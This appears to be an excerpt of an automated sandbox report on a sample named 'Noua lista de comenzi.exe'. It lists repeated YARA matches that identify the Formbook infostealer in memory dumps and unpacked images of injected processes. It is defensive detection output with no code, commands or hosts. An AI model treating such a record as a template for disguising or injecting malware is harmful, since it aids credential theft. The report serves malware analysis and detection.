          Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Noua lista de comenzi.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
